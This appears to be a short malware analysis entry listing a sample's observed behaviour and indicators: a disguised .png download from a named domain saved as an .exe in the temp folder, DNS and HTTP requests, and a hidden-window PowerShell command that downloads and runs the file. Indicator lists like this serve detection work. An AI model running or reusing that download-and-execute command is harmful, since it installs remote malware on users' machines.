Technical Information
- http://idocakes.ca/cus5pv27ci8rvfuobyycu.png as %temp%\cosngx.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://idocakes.ca/cuS5pV27ci8rvFuoBYYCU.png','%TMP%\cosngx.exe');Start-Process '%TMP%\cosngx.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1868
- %TEMP%\1123722.cvr
- 'id##akes.ca':80
- http://id##akes.ca/cuS5pV27ci8rvFuoBYYCU.png
- DNS ASK id##akes.ca
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://idocakes.ca/cuS5pV27ci8rvFuoBYYCU.png','%TMP%\cosngx.exe');Start-Process '%TMP%\cosngx.exe';' (with hidden window)